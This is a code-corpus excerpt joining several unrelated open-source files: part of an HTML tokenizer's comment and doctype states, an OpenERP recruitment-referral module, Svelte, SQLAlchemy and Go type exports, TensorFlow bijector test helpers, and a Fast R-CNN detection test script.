elif charStack[-1] in (u'd', u'D'):
matched = True
for expected in ((u'o', u'O'), (u'c', u'C'), (u't', u'T'),
(u'y', u'Y'), (u'p', u'P'), (u'e', u'E')):
charStack.append(self.stream.char())
if charStack[-1] not in expected:
matched = False
break
if matched:
self.currentToken = {"type": tokenTypes["Doctype"],
"name": u"",
"publicId": None, "systemId": None,
"correct": True}
self.state = self.states["doctype"]
return True
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-dashes-or-doctype"})
# charStack[:-2] consists of 'safe' characters ('-', 'd', 'o', etc)
# so they can be copied directly into the bogus comment data, and only
# the last character might be '>' or EOF and needs to be ungetted
self.stream.unget(charStack.pop())
self.currentToken = {"type": tokenTypes["Comment"],
"data": u"".join(charStack)}
self.state = self.states["bogusCommentContinuation"]
return True
def commentStartState(self):
data = self.stream.char()
if data == "-":
self.state = self.states["commentStartDash"]
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"incorrect-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.currentToken["data"] += data + self.stream.charsUntil(u"-")
self.state = self.states["comment"]
return True
def commentStartDashState(self):
data = self.stream.char()
if data == "-":
self.state = self.states["commentEnd"]
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"incorrect-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.currentToken["data"] += "-" + data + self.stream.charsUntil(u"-")
self.state = self.states["comment"]
return True
def commentState(self):
data = self.stream.char()
if data == u"-":
self.state = self.states["commentEndDash"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.currentToken["data"] += data + self.stream.charsUntil(u"-")
return True
def commentEndDashState(self):
data = self.stream.char()
if data == u"-":
self.state = self.states["commentEnd"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-end-dash"})
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.currentToken["data"] += u"-" + data +\
self.stream.charsUntil(u"-")
# Consume the next character which is either a "-" or an EOF as
# well so if there's a "-" directly after the "-" we go nicely to
# the "comment end state" without emitting a ParseError() there.
self.stream.char()
return True
def commentEndState(self):
data = self.stream.char()
if data == u">":
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data == u"-":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-dash-after-double-dash-in-comment"})
self.currentToken["data"] += data
elif data in spaceCharacters:
self.currentToken["data"] += "--" + data
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-space-after-double-dash-in-comment"})
self.state = self.states["commentEndSpace"]
elif data == "!":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-bang-after-double-dash-in-comment"})
self.state = self.states["commentEndBang"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-double-dash"})
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
# XXX
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-comment"})
self.currentToken["data"] += u"--" + data
self.state = self.states["comment"]
return True
def commentEndBangState(self):
data = self.stream.char()
if data == u">":
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data == u"-":
self.currentToken["data"] += "--!"
self.state = self.states["commentEndDash"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-end-bang-state"})
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.currentToken["data"] += u"--!" + data
self.state = self.states["comment"]
return True
def commentEndSpaceState(self):
data = self.stream.char()
if data == u">":
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data == u"-":
self.state = self.states["commentEndDash"]
elif data in spaceCharacters:
self.currentToken["data"] += data
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-end-space-state"})
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.currentToken["data"] += data
self.state = self.states["comment"]
return True
def doctypeState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.states["beforeDoctypeName"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-eof"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"need-space-after-doctype"})
self.stream.unget(data)
self.state = self.states["beforeDoctypeName"]
return True
def beforeDoctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == u">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-right-bracket"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-eof"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.currentToken["name"] = data
self.state = self.states["doctypeName"]
return True
def doctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.state = self.states["afterDoctypeName"]
elif data == u">":
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype-name"})
self.currentToken["correct"] = False
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.currentToken["name"] += data
return True
def afterDoctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == u">":
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data is EOF:
self.currentToken["correct"] = False
self.stream.unget(data)
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
if data in (u"p", u"P"):
matched = True
for expected in ((u"u", u"U"), (u"b", u"B"), (u"l", u"L"),
(u"i", u"I"), (u"c", u"C")):
data = self.stream.char()
if data not in expected:
matched = False
break
if matched:
self.state = self.states["beforeDoctypePublicIdentifier"]
return True
elif data in (u"s", u"S"):
matched = True
for expected in ((u"y", u"Y"), (u"s", u"S"), (u"t", u"T"),
(u"e", u"E"), (u"m", u"M")):
data = self.stream.char()
if data not in expected:
matched = False
break
if matched:
self.state = self.states["beforeDoctypeSystemIdentifier"]
return True
# All the characters read before the current 'data' will be
# [a-zA-Z], so they're garbage in the bogus doctype and can be
# discarded; only the latest character might be '>' or EOF
# and needs to be ungetted
self.stream.unget(data)
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-space-or-right-bracket-in-doctype", "datavars":
{"data": data}})
self.currentToken["correct"] = False
self.state = self.states["bogusDoctype"]
return True
def beforeDoctypePublicIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken["publicId"] = u""
self.state = self.states["doctypePublicIdentifierDoubleQuoted"]
elif data == "'":
self.currentToken["publicId"] = u""
self.state = self.states["doctypePublicIdentifierSingleQuoted"]
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.states["bogusDoctype"]
return True
def doctypePublicIdentifierDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.states["afterDoctypePublicIdentifier"]
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.currentToken["publicId"] += data
return True
def doctypePublicIdentifierSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.states["afterDoctypePublicIdentifier"]
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.currentToken["publicId"] += data
return True
def afterDoctypePublicIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken["systemId"] = u""
self.state = self.states["doctypeSystemIdentifierDoubleQuoted"]
elif data == "'":
self.currentToken["systemId"] = u""
self.state = self.states["doctypeSystemIdentifierSingleQuoted"]
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.states["bogusDoctype"]
return True
def beforeDoctypeSystemIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken["systemId"] = u""
self.state = self.states["doctypeSystemIdentifierDoubleQuoted"]
elif data == "'":
self.currentToken["systemId"] = u""
self.state = self.states["doctypeSystemIdentifierSingleQuoted"]
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.states["bogusDoctype"]
return True
def doctypeSystemIdentifierDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.states["afterDoctypeSystemIdentifier"]
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.currentToken["systemId"] += data
return True
def doctypeSystemIdentifierSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.states["afterDoctypeSystemIdentifier"]
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.currentToken["systemId"] += data
return True
def afterDoctypeSystemIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.state = self.states["bogusDoctype"]
return True
def bogusDoctypeState(self):
data = self.stream.char()
if data == u">":
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data is EOF:
# XXX EMIT
self.stream.unget(data)
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
pass
return True | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
#/#############################################################################
#
# Jobs Global
# Copyright (C) 2014-TODAY Jobs Global(http://www.jobsglobal.com).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#/#############################################################################
from openerp import api,models
from openerp.osv import osv, fields
from openerp.tools.translate import _
from openerp import tools
class work_experience(osv.osv):
_name = 'work.experience'
_description = "Work Experience"
_columns = {
'referral_id':fields.many2one('manpower.referral'),
'employer_name': fields.char("Name of Employer"),
'job_title':fields.char('Job Title'),
'start_date':fields.date("Start Date"),
'end_date':fields.date("End Date"),
}
class education_qualification(osv.osv):
_name = 'education.qualification'
_description = "Education Qualification"
_columns = {
'referral_id':fields.many2one('manpower.referral'),
'highest_qualification': fields.char("Highest qualification"),
'institute':fields.char('Institute'),
'end_date':fields.date("End Date"),
}
class skills(osv.osv):
_name = 'skills'
_description = "Skills"
_order = "id desc"
_columns ={
'name' : fields.char("Name")
}
class joined_activities(osv.osv):
_name = 'joined.activities'
_description = "Joined Activities"
_order = "id desc"
_columns ={
'referral_id':fields.many2one('manpower.referral'),
'date' : fields.datetime("Date"),
'description':fields.text("Description")
}
class calendar_event(osv.Model):
""" Model for Calendar Event """
_inherit = 'calendar.event'
_columns = {
'referrals_id': fields.many2one('manpower.referral', 'Referral'),
}
class manpower_referral(osv.osv):
_name = 'manpower.referral'
_description = "Manpower Referral"
_inherit = ['mail.thread', 'ir.needaction_mixin']
def _meeting_count(self, cr, uid, ids, field_name, arg, context=None):
event = self.pool['calendar.event']
return {
ref_id: event.search_count(cr,uid, [('referrals_id', '=', ref_id)], context=context)
for ref_id in ids
}
_columns = {
'name': fields.char("Name"),
'no_cv':fields.boolean('No CV'),
'first_name':fields.char("First Name"),
'sur_name':fields.char("Sur Name"),
'age':fields.integer("Age"),
'location':fields.char("Location"),
'nationality':fields.many2one('res.country',string="Nationality"),
'position_referred':fields.char("Position preferred"), # TO CHANGE
'current_position':fields.char("Current Position"), # TO CHANGE
'work_experience_ids':fields.one2many('work.experience','referral_id', "Work Experience"),
'education_ids':fields.one2many('education.qualification','referral_id', "Education"),
'activity_ids':fields.one2many('joined.activities','referral_id', "Joined Activities"),
'skill_ids':fields.many2many('skills','referral_skills_rel','skill_id','masterskills_id',"Skills"),
'contact_date':fields.datetime("Contact Date"),
'user_id': fields.many2one('res.users', 'User'),
'meeting_count': fields.function(_meeting_count, string='# Meetings', type='integer'),
}
_defaults = {
'user_id': lambda s, cr, uid, c: uid,
}
@api.multi
def action_upload_cv(self):
res = {
'type': 'ir.actions.client',
'name':'Upload CV',
'tag':'acesmanpower.uploadpage',
}
return res
@api.multi
def send_email(self):
return True
def schedule_meeting(self, cr, uid, ids, context=None):
"""
Open meeting's calendar view to schedule meeting on current referral.
:return dict: dictionary value for created Meeting view
"""
referral = self.browse(cr, uid, ids[0], context)
res = self.pool.get('ir.actions.act_window').for_xml_id(cr, uid, 'calendar', 'action_calendar_event', context)
partner_ids = [self.pool['res.users'].browse(cr, uid, uid, context=context).partner_id.id]
if referral.user_id.partner_id:
partner_ids.append(referral.user_id.partner_id.id)
res['context'] = {
'search_default_referrals_id': referral.id or False,
'default_referrals_id': referral.id or False,
'default_partner_id': referral.user_id.partner_id and referral.user_id.partner_id.id or False,
'default_name': referral.first_name
}
return res
def joined_activity(self, cr, uid, ids, context=None):
models_data = self.pool.get('ir.model.data')
ids = self.browse(cr, uid, ids, context=context)[0]
# Get opportunity views
dummy, form_view = models_data.get_object_reference(cr, uid, 'acesmanpower', 'view_manpower_referral_activities_form')
dummy, tree_view = models_data.get_object_reference(cr, uid, 'acesmanpower', 'view_manpower_referral_activities_tree')
return {
'name': _('Joined Activities'),
'view_type': 'tree',
'view_mode': 'tree,form',
'res_model': 'joined.activities',
'res_id': int(ids),
'view_id': False,
'views': [(tree_view or False, 'tree'),(form_view or False, 'form')],
'type': 'ir.actions.act_window',
'context': {}
}
class referral_analysis_report(osv.Model):
""" Referral Analysis """
_name = "referral.analysis.report"
_auto = False
_description = "Referral Analysis"
_columns = {
'create_date': fields.datetime('Creation Date', readonly=True),
'nbr_cases': fields.integer("# of Cases", readonly=True),
'user_id':fields.many2one('res.users', 'User', readonly=True),
'join_id':fields.many2one('joined.activities','Activity',readonly=True),
'total_activities': fields.integer("# of Activities", readonly=True),
'first_name':fields.related('manpower.referral.first_name'),
}
def init(self, cr):
"""
Referral Analysis Report
@param cr: the current row, from the database cursor
"""
tools.drop_view_if_exists(cr, 'referral_analysis_report')
cr.execute("""
CREATE OR REPLACE VIEW referral_analysis_report AS (
SELECT
m.id,
count(m.id) as nbr_cases,
m.user_id,
m.first_name as first_name,
m.contact_date as create_date,
(select count(*) from joined_activities where joined_activities.referral_id = m.id) as total_activities,
count(j.referral_id) as activities
FROM
manpower_referral m
INNER JOIN joined_activities j
ON j.referral_id = m.id
GROUP BY m.id,m.user_id
)""")
# class manpower_referral_line(osv.osv):
# _name = 'manpower.referral.line'
# _description = "Manpower Referral Details" | unknown | codeparrot/codeparrot-clean | ||
export { SvelteDate } from './date.js';
export { SvelteSet } from './set.js';
export { SvelteMap } from './map.js';
export { SvelteURL } from './url.js';
export { SvelteURLSearchParams } from './url-search-params.js';
export { MediaQuery } from './media-query.js';
export { createSubscriber } from './create-subscriber.js'; | javascript | github | https://github.com/sveltejs/svelte | packages/svelte/src/reactivity/index-client.js |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Bijector unit-test utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.distributions.python.ops import uniform as uniform_lib
from tensorflow.python.framework import ops
from tensorflow.python.ops import math_ops
def assert_finite(array):
if not np.isfinite(array).all():
raise AssertionError("array was not all finite. %s" % array[:15])
def assert_strictly_increasing(array):
np.testing.assert_array_less(0., np.diff(array))
def assert_strictly_decreasing(array):
np.testing.assert_array_less(np.diff(array), 0.)
def assert_strictly_monotonic(array):
if array[0] < array[-1]:
assert_strictly_increasing(array)
else:
assert_strictly_decreasing(array)
def assert_scalar_congruency(bijector,
lower_x,
upper_x,
n=int(10e3),
rtol=0.01,
sess=None):
"""Assert `bijector`'s forward/inverse/inverse_log_det_jacobian are congruent.
We draw samples `X ~ U(lower_x, upper_x)`, then feed these through the
`bijector` in order to check that:
1. the forward is strictly monotonic.
2. the forward/inverse methods are inverses of each other.
3. the jacobian is the correct change of measure.
This can only be used for a Bijector mapping open subsets of the real line
to themselves. This is due to the fact that this test compares the `prob`
before/after transformation with the Lebesgue measure on the line.
Args:
bijector: Instance of Bijector
lower_x: Python scalar.
upper_x: Python scalar. Must have `lower_x < upper_x`, and both must be in
the domain of the `bijector`. The `bijector` should probably not produce
huge variation in values in the interval `(lower_x, upper_x)`, or else
the variance based check of the Jacobian will require small `rtol` or
huge `n`.
n: Number of samples to draw for the checks.
rtol: Positive number. Used for the Jacobian check.
sess: `tf.Session`. Defaults to the default session.
Raises:
AssertionError: If tests fail.
"""
# Checks and defaults.
assert bijector.event_ndims.eval() == 0
if sess is None:
sess = ops.get_default_session()
# Should be monotonic over this interval
ten_x_pts = np.linspace(lower_x, upper_x, num=10).astype(np.float32)
if bijector.dtype is not None:
ten_x_pts = ten_x_pts.astype(bijector.dtype.as_numpy_dtype)
forward_on_10_pts = bijector.forward(ten_x_pts)
# Set the lower/upper limits in the range of the bijector.
lower_y, upper_y = sess.run(
[bijector.forward(lower_x), bijector.forward(upper_x)])
if upper_y < lower_y: # If bijector.forward is a decreasing function.
lower_y, upper_y = upper_y, lower_y
# Uniform samples from the domain, range.
uniform_x_samps = uniform_lib.Uniform(
low=lower_x, high=upper_x).sample(n, seed=0)
uniform_y_samps = uniform_lib.Uniform(
low=lower_y, high=upper_y).sample(n, seed=1)
# These compositions should be the identity.
inverse_forward_x = bijector.inverse(bijector.forward(uniform_x_samps))
forward_inverse_y = bijector.forward(bijector.inverse(uniform_y_samps))
# For a < b, and transformation y = y(x),
# (b - a) = \int_a^b dx = \int_{y(a)}^{y(b)} |dx/dy| dy
# "change_measure_dy_dx" below is a Monte Carlo approximation to the right
# hand side, which should then be close to the left, which is (b - a).
dy_dx = math_ops.exp(bijector.inverse_log_det_jacobian(uniform_y_samps))
# E[|dx/dy|] under Uniform[lower_y, upper_y]
# = \int_{y(a)}^{y(b)} |dx/dy| dP(u), where dP(u) is the uniform measure
expectation_of_dy_dx_under_uniform = math_ops.reduce_mean(dy_dx)
# dy = dP(u) * (upper_y - lower_y)
change_measure_dy_dx = (
(upper_y - lower_y) * expectation_of_dy_dx_under_uniform)
# We'll also check that dy_dx = 1 / dx_dy.
dx_dy = math_ops.exp(
bijector.forward_log_det_jacobian(bijector.inverse(uniform_y_samps)))
[
forward_on_10_pts_v,
dy_dx_v,
dx_dy_v,
change_measure_dy_dx_v,
uniform_x_samps_v,
uniform_y_samps_v,
inverse_forward_x_v,
forward_inverse_y_v,
] = sess.run([
forward_on_10_pts,
dy_dx,
dx_dy,
change_measure_dy_dx,
uniform_x_samps,
uniform_y_samps,
inverse_forward_x,
forward_inverse_y,
])
assert_strictly_monotonic(forward_on_10_pts_v)
# Composition of forward/inverse should be the identity.
np.testing.assert_allclose(
inverse_forward_x_v, uniform_x_samps_v, atol=1e-5, rtol=1e-3)
np.testing.assert_allclose(
forward_inverse_y_v, uniform_y_samps_v, atol=1e-5, rtol=1e-3)
# Change of measure should be correct.
np.testing.assert_allclose(
upper_x - lower_x, change_measure_dy_dx_v, atol=0, rtol=rtol)
# Inverse Jacobian should be equivalent to the reciprocal of the forward
# Jacobian.
np.testing.assert_allclose(
dy_dx_v, np.divide(1., dx_dy_v), atol=1e-5, rtol=1e-3)
def assert_bijective_and_finite(bijector, x, y, atol=0, rtol=1e-5, sess=None):
"""Assert that forward/inverse (along with jacobians) are inverses and finite.
It is recommended to use x and y values that are very very close to the edge
of the Bijector's domain.
Args:
bijector: A Bijector instance.
x: np.array of values in the domain of bijector.forward.
y: np.array of values in the domain of bijector.inverse.
atol: Absolute tolerance.
rtol: Relative tolerance.
sess: TensorFlow session. Defaults to the default session.
Raises:
AssertionError: If tests fail.
"""
sess = sess or ops.get_default_session()
# These are the incoming points, but people often create a crazy range of
# values for which these end up being bad, especially in 16bit.
assert_finite(x)
assert_finite(y)
f_x = bijector.forward(x)
g_y = bijector.inverse(y)
[
x_from_x,
y_from_y,
ildj_f_x,
fldj_x,
ildj_y,
fldj_g_y,
f_x_v,
g_y_v,
] = sess.run([
bijector.inverse(f_x),
bijector.forward(g_y),
bijector.inverse_log_det_jacobian(f_x),
bijector.forward_log_det_jacobian(x),
bijector.inverse_log_det_jacobian(y),
bijector.forward_log_det_jacobian(g_y),
f_x,
g_y,
])
assert_finite(x_from_x)
assert_finite(y_from_y)
assert_finite(ildj_f_x)
assert_finite(fldj_x)
assert_finite(ildj_y)
assert_finite(fldj_g_y)
assert_finite(f_x_v)
assert_finite(g_y_v)
np.testing.assert_allclose(x_from_x, x, atol=atol, rtol=rtol)
np.testing.assert_allclose(y_from_y, y, atol=atol, rtol=rtol)
np.testing.assert_allclose(-ildj_f_x, fldj_x, atol=atol, rtol=rtol)
np.testing.assert_allclose(-ildj_y, fldj_g_y, atol=atol, rtol=rtol) | unknown | codeparrot/codeparrot-clean | ||
# mssql/__init__.py
# Copyright (C) 2005-2016 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from sqlalchemy.dialects.mssql import base, pyodbc, adodbapi, \
pymssql, zxjdbc, mxodbc
base.dialect = pyodbc.dialect
from sqlalchemy.dialects.mssql.base import \
INTEGER, BIGINT, SMALLINT, TINYINT, VARCHAR, NVARCHAR, CHAR, \
NCHAR, TEXT, NTEXT, DECIMAL, NUMERIC, FLOAT, DATETIME,\
DATETIME2, DATETIMEOFFSET, DATE, TIME, SMALLDATETIME, \
BINARY, VARBINARY, BIT, REAL, IMAGE, TIMESTAMP,\
MONEY, SMALLMONEY, UNIQUEIDENTIFIER, SQL_VARIANT, dialect
__all__ = (
'INTEGER', 'BIGINT', 'SMALLINT', 'TINYINT', 'VARCHAR', 'NVARCHAR', 'CHAR',
'NCHAR', 'TEXT', 'NTEXT', 'DECIMAL', 'NUMERIC', 'FLOAT', 'DATETIME',
'DATETIME2', 'DATETIMEOFFSET', 'DATE', 'TIME', 'SMALLDATETIME',
'BINARY', 'VARBINARY', 'BIT', 'REAL', 'IMAGE', 'TIMESTAMP',
'MONEY', 'SMALLMONEY', 'UNIQUEIDENTIFIER', 'SQL_VARIANT', 'dialect'
) | unknown | codeparrot/codeparrot-clean | ||
// Code generated by go-swagger; DO NOT EDIT.
package container
// This file was generated by the swagger tool.
// Editing this file might prove futile when you re-run the swagger generate command
// CreateResponse ContainerCreateResponse
//
// # OK response to ContainerCreate operation
//
// swagger:model CreateResponse
type CreateResponse struct {
// The ID of the created container
// Example: ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743
// Required: true
ID string `json:"Id"`
// Warnings encountered when creating the container
// Example: []
// Required: true
Warnings []string `json:"Warnings"`
} | go | github | https://github.com/moby/moby | api/types/container/create_response.go |
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Test a Fast R-CNN network on an imdb (image database)."""
from ism.config import cfg, get_output_dir
import argparse
from utils.timer import Timer
import numpy as np
import cv2
import caffe
import cPickle
from utils.blob import im_list_to_blob
import os
import math
import scipy.io
from scipy.optimize import minimize
def _get_image_blob(im, im_depth):
"""Converts an image into a network input.
Arguments:
im (ndarray): a color image in BGR order
Returns:
blob (ndarray): a data blob holding an image pyramid
im_scale_factors (list): list of image scales (relative to im) used
in the image pyramid
"""
# RGB
im_orig = im.astype(np.float32, copy=True)
im_orig -= cfg.PIXEL_MEANS
processed_ims = []
im_scale_factors = []
assert len(cfg.TEST.SCALES_BASE) == 1
im_scale = cfg.TEST.SCALES_BASE[0]
im = cv2.resize(im_orig, None, None, fx=im_scale, fy=im_scale, interpolation=cv2.INTER_LINEAR)
im_scale_factors.append(im_scale)
processed_ims.append(im)
# im_info
im_info = np.hstack((im.shape[:2], im_scale))[np.newaxis, :]
# depth
im_orig = im_depth.astype(np.float32, copy=True)
im_orig = im_orig / im_orig.max() * 255
im_orig = np.tile(im_orig[:,:,np.newaxis], (1,1,3))
im_orig -= cfg.PIXEL_MEANS
processed_ims_depth = []
im = cv2.resize(im_orig, None, None, fx=im_scale, fy=im_scale, interpolation=cv2.INTER_LINEAR)
processed_ims_depth.append(im)
# Create a blob to hold the input images
blob = im_list_to_blob(processed_ims, 3)
blob_depth = im_list_to_blob(processed_ims_depth, 3)
return blob, blob_depth, im_info, np.array(im_scale_factors)
def im_detect(net, im, im_depth, num_classes):
"""Detect object classes in an image given boxes on grids.
Arguments:
net (caffe.Net): Fast R-CNN network to use
im (ndarray): color image to test (in BGR order)
boxes (ndarray): R x 4 array of boxes
Returns:
scores (ndarray): R x K array of object class scores (K includes
background as object category 0)
boxes (ndarray): R x (4*K) array of predicted bounding boxes
"""
# compute image blob
im_blob, im_depth_blob, im_info, im_scale_factors = _get_image_blob(im, im_depth)
# reshape network inputs
net.blobs['data_image'].reshape(*(im_blob.shape))
net.blobs['data_depth'].reshape(*(im_depth_blob.shape))
net.blobs['im_info'].reshape(*(im_info.shape))
blobs_out = net.forward(data_image=im_blob.astype(np.float32, copy=False),
data_depth=im_depth_blob.astype(np.float32, copy=False),
im_info=im_info.astype(np.float32, copy=False))
# get outputs
scale = im_info[0, 2]
boxes = blobs_out['rois'][:, 1:].copy() / scale
scores = blobs_out['scores'].copy()
seg_cls_prob = blobs_out['seg_cls_prob']
seg_view_pred = blobs_out['seg_view_pred']
return boxes, scores, seg_cls_prob, seg_view_pred
# backproject pixels into 3D points
